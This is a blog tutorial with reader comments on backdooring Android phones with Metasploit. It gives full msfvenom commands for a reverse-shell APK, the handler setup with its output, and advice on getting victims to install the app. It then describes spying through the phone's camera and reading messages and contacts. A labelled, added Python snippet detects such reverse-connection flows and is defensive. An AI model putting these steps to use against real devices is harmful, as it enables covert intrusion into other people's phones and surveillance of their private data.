How to hack an Android phone – Metasploit

Android is the most popular mobile platform; its user base grows day by day, and so do the security threats. Android phones are vulnerable and can be easily backdoored. Metasploit is the best tool in Kali Linux for generating and handling a payload. Metasploit has more than 1000 exploits, which is more than enough. Here we use Metasploit to hack Android. We will create a backdoor package using msfvenom. Executing the APK on the target device will give you a reverse Meterpreter shell.

 


Requirements

1. Metasploit framework

 

It's pre-installed in Kali. If you don't find it, download and install it with the following command:

 

# apt-get install metasploit-framework

 

Generating Payload (.apk)

Normally the msfpayload command was used to generate a payload; since Kali 2.0, msfvenom is used instead of msfpayload.

# msfvenom -p android/meterpreter/reverse_tcp --platform android LHOST="attacker IP" LPORT=444 -o /root/Desktop/payload.apk

 

An APK will be generated on the desktop. The attacker IP can be your local IP, but if the target is on the WAN (anywhere on the internet), provide your external IP and forward port 444 on your router.
Example:
# msfvenom -p android/meterpreter/reverse_tcp --platform android LHOST=192.168.106.129 LPORT=444 -o /root/Desktop/payload.apk
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8496 bytes
Saved as: /root/Desktop/payload.apk

 

Setting up reverse handler

Now start the msf reverse handler on your Kali machine. Fire up Metasploit:

# msfconsole

Wait a minute for msfconsole to come up. Then use the handler and set the payload and options.

1. Handler

msf> use multi/handler

2. Set payload

msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST "attacker ip"

5. Exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.106.129:444
[*] Starting the payload handler…

 

Executing the payload on Target

To make the reverse connection, you have to execute the payload on the target device. If you have direct access to the target device, copy the APK that you created and install it. Otherwise, upload it to some server, give the target the link and have them install the APK.

Now come back to our handler. If the target has executed it, a meterpreter shell will be spawned. Now you are the owner of the system!

[*] Started reverse handler on 192.168.106.129:444
[*] Starting the payload handler…
[*] Sending stage (56173 bytes) to 192.168.137.31
[*] Meterpreter session 1 opened (192.168.106.129:444 -> 192.168.137.31:38023) at 2015-12-08 04:50:59 -0500
meterpreter >
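
Seen from the network, the session above is a handset opening an outbound TCP connection to port 444. The following is an added example, not part of the original post, that flags such flows in constructed flow records; the handset subnet, the port allowlist and the log format are assumptions.

```python
import ipaddress
from collections import defaultdict

# Assumptions (not from the original post): handset subnet, allowlist, log format.
HANDSET_NET = ipaddress.ip_network("192.168.137.0/24")
# Allowlist rather than a match on 444: LPORT is chosen by whoever builds
# the payload, so only "port we do not expect from phones" generalises.
EXPECTED_PORTS = {53, 80, 123, 443, 853, 5228}

# Constructed flow records: "time src:sport -> dst:dport proto bytes".
# The port-444 flows mirror the session line in the handler output above.
SAMPLE_FLOWS = """\
04:50:01 192.168.137.31:41022 -> 203.0.113.10:443 tcp 18233
04:50:59 192.168.137.31:38023 -> 192.168.106.129:444 tcp 56173
04:51:10 192.168.137.45:50110 -> 198.51.100.53:53 udp 120
04:53:30 192.168.137.31:38077 -> 192.168.106.129:444 tcp 9120
04:55:00 192.168.106.20:51000 -> 192.168.106.129:444 tcp 300
malformed line
"""

def parse_flow(line):
    """Return (time, src_ip, dst_ip, dst_port, proto, nbytes) or None."""
    parts = line.split()
    if len(parts) != 6 or parts[2] != "->":
        return None
    try:
        src_ip, _ = parts[1].rsplit(":", 1)
        dst_ip, dport = parts[3].rsplit(":", 1)
        return (parts[0], ipaddress.ip_address(src_ip),
                ipaddress.ip_address(dst_ip), int(dport), parts[4], int(parts[5]))
    except ValueError:
        return None

def suspicious_flows(text):
    """Group handset-originated TCP flows to ports outside the allowlist."""
    hits = defaultdict(lambda: {"count": 0, "bytes": 0})
    for line in text.splitlines():
        rec = parse_flow(line)
        if rec is None:
            continue
        _, src, dst, dport, proto, nbytes = rec
        if src in HANDSET_NET and proto == "tcp" and dport not in EXPECTED_PORTS:
            key = (str(src), str(dst), dport)
            hits[key]["count"] += 1
            hits[key]["bytes"] += nbytes
    return dict(hits)

if __name__ == "__main__":
    print(suspicious_flows(SAMPLE_FLOWS))
```

Repeated flows from one handset to the same destination and unexpected port, as grouped here, are the signal worth alerting on; a single hit may be a legitimate app on an unusual port.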

Now you can read messages, contacts and the call log, access the camera and mic, and upload and download files.

Use the help command for more options:

meterpreter > help

The part I find most interesting is spying through the camera.

 

meterpreter > webcam_stream

With this command you get a live stream from the main camera. Even though the frame rate is low, you can spy on them like in a James Bond movie. You can also spy through the front camera or the secondary camera with the command:

 

meterpreter > webcam_stream 2

Happy hacking!

susmith HCK

I’m a computer enthusiast basically and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and I would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all this stuff, add me on Facebook and Google Plus.


12 Responses

  1. whoah this blog is wonderful i really like reading your posts. Stay up the great paintings! You realize, many individuals are hunting around for this info, you can help them greatly.

    • admin says:

      Thank you. I know the struggle of being a noob in hacking, so I thought of sharing what I have got. Pls keep sharing 🙂

  2. shasi says:

    This blog is awesome for noobs… I created the payload app, but it is not installing on my Sony S mobile… it shows "app not installed". How do I overcome this problem?

  3. Shasi says:

    Some mobiles are accepting the installation. I have installed it on one mobile… started the exploit, but it got stuck on "Starting the payload handler…". The victim mobile is connected to the WLAN network, but the payload is not working… is there any fault? I’m using the local IP address… how do I find the external IP address? Any solution for this?

  4. Dem says:

    If you delete the APK file on your mobile, does the backdoor/payload still affect the Android mobile?

  5. conrad says:

    Is it supported on Ubuntu 16.04? Coz every time I tried to install Metasploit in the terminal I got the error "Unable to locate package metasploit-framework".

  6. madhavan says:

    Bro, my phone runs on Android 4.2.1 Jelly Bean, and the app that I created doesn't work on it… plz help me out!

  7. Elliot says:

    I followed the steps and reached the step where the Meterpreter session is opened, after running the payload app on the mobile. But thereafter, it gets stuck. The meterpreter console doesn’t show up as shown in the video and images. So, I can’t move further.
